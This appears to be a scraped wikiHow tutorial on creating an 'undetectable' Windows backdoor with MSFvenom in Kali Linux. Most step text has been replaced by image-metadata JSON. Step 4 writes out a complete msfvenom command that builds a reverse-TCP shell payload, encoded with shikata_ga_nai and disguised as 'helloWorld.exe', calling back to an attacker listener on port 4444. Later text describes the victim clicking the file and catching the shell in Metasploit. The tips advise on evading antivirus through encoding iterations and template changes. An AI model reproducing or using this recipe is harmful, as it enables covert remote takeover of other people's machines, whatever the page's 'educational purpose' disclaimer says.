How to Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux

PDF download Download Article
PDF download Download Article

A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably. Using MSFvenom, the combination of msfpayload and msfencode, it's possible to create a backdoor that connects back to the attacker by using reverse shell TCP. In order to develop a backdoor, you need to change the signature of your malware to evade any antivirus software. Complete this project on a pair of computers that you have permission to access, and in the process, you'll learn more about computer security and how this kind of backdoor works.

Steps

PDF download Download Article
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/4c\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-1.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-1.jpg","bigUrl":"\/images\/thumb\/4\/4c\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-1.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-1.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/d9\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-2.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-2.jpg","bigUrl":"\/images\/thumb\/d\/d9\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-2.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    Advertisement
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/9\/95\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-3.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-3.jpg","bigUrl":"\/images\/thumb\/9\/95\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-3.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-3.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    • You will use x86/shikata_ga_nai as the encoder.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/52\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-4.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-4.jpg","bigUrl":"\/images\/thumb\/5\/52\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-4.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-4.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    Type "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
    • -a x86 --platform windows designates architecture to use.
    • -p windows/shell/reverse_tcp designates the payloads to embed.
    • LHOST designates the listener IP address.
    • LPORT designates the listener port.
    • -b "\x00" designates to avoid bad character (null bytes).
    • -e x86/shikata_ga_nai designates the encoders name.
    • -f exe > helloWorld.exe designates format output.
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/3\/33\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-5.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-5.jpg","bigUrl":"\/images\/thumb\/3\/33\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-5.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-5.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    • Now you have generated your backdoor. When the victim clicks on helloWorld.exe, the shell payload that is embedded will be activated and make a connection back to your system. In order to receive the connection, you have to open the multi-handler in Metasploit and set the payloads.
  6. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/f\/fe\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-6.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-6.jpg","bigUrl":"\/images\/thumb\/f\/fe\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-6.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-6.jpg","smallWidth":460,"smallHeight":346,"bigWidth":728,"bigHeight":547,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
  7. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-7.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-7.jpg","bigUrl":"\/images\/thumb\/2\/2c\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-7.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-7.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
  8. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/6\/63\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-8.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-8.jpg","bigUrl":"\/images\/thumb\/6\/63\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-8.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-8.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
  9. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/1\/1b\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-9.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-9.jpg","bigUrl":"\/images\/thumb\/1\/1b\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-9.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-9.jpg","smallWidth":460,"smallHeight":339,"bigWidth":728,"bigHeight":537,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    • "LHOST" designates the listener IP address.
  10. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/f\/f0\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-10.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-10.jpg","bigUrl":"\/images\/thumb\/f\/f0\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-10.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-10.jpg","smallWidth":460,"smallHeight":339,"bigWidth":728,"bigHeight":537,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    • "LPORT" designates the listener port.
  11. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/25\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-11.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-11.jpg","bigUrl":"\/images\/thumb\/2\/25\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-11.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-11.jpg","smallWidth":460,"smallHeight":339,"bigWidth":728,"bigHeight":537,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
  12. {"smallUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/ab\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-12.jpg\/v4-460px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-12.jpg","bigUrl":"\/images\/thumb\/a\/ab\/Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-12.jpg\/aid8178622-v4-728px-Create-a-Nearly-Undetectable-Backdoor-using-MSFvenom-in-Kali-Linux-Step-12.jpg","smallWidth":460,"smallHeight":339,"bigWidth":728,"bigHeight":537,"licensing":"<div class=\"mw-parser-output\"><p>License: <a target=\"_blank\" rel=\"nofollow noreferrer noopener\" class=\"external text\" href=\"https:\/\/en.wikipedia.org\/wiki\/Fair_use\">Fair Use<\/a> (screenshot)<br>\n<\/p><\/div>"}
    Then you will be successfully connected to the victim's machine.
    13. Advertisement

Community Q&A

Search
Add New Question
  • Question
    What do I do if an error pops up when creating the exploit?
    MOHMMD ELFA
    Community Answer
    Make sure you did everything correctly and try again. Make sure your are running Kali Linux.
    Thanks! We're glad this was helpful.
    Thank you for your feedback.
    If wikiHow has helped you, please consider a small contribution to support us in helping more readers like you. We’re committed to providing the world with free how-to resources, and even $1 helps us in our mission. Support wikiHow
    Yes No
    Not Helpful 12 Helpful 9
Ask a Question
200 characters left
Include your email address to get a message when this question is answered.
Submit
      Advertisement

      Tips

      • Using -i <numbers> in MSFvenom will represent the iterations the encoding. Sometimes more iterations may help to evade the AV software.
        Thanks
      • You have learned how to generate the backdoor and encoded by using MSFvenom, but this method will not work perfectly against some of the AV software nowadays. The reason behind this is because of the execution templates in MSFvenom. The AV vendors have added the static signature of these templates and just look for them. The solution for this issue is to use a different execution template or different tools.
        Thanks
      Submit a Tip
      All tip submissions are carefully reviewed before being published
      Submit
      Thanks for submitting a tip for review!
      Advertisement

      Warnings

      • This article is for educational purpose only. Hacking without authorization or permission is unethical and often illegal.
        Thanks
      Advertisement

      Things You'll Need

      • Kali Linux
      • Windows
      • Virtual machine
        • VirtualBox

      You Might Also Like

      The Ultimate Guide to Hacking for Beginners
      How to Stream PS5 to Discord: Remote Play, Capture Card, or Voice Chat
      How to
      Reset a BIOS Password
      How to Hack Screen Time: 12 Easy Workarounds to Try
      How to Use Cheat Engine
      How to Find Out a Password: 8 Tricks to Gain Access to Accounts
      How to
      Hack Gmail
      How to Connect Apple AirTags to Multiple iPhones and Other Devices
      How to
      Crash Your Computer Using a Batch File
      How to
      Hack a PlayStation Portable
      How to
      Hack Games
      How to
      Hack a Website with Basic HTML Coding
      A Simple Guide to Creating a QR Code to Your Google Form
      How to
      Lock a Folder Using a Batch File
      Advertisement

      References

      1. OCCUPYTHEWEB. Metasploit for the Aspiring Hacker, Part 5 (Msfvenom). from http://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-5-msfvenom-0159520/
      2. thelightcosine. The Odd Couple: Metasploit and Antivirus Solutions (Dec 13, 2012). from https://community.rapid7.com/community/metasploit/blog/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions

      About This Article

      Thanks to all authors for creating a page that has been read 124,217 times.

      Is this article up to date?

      Advertisement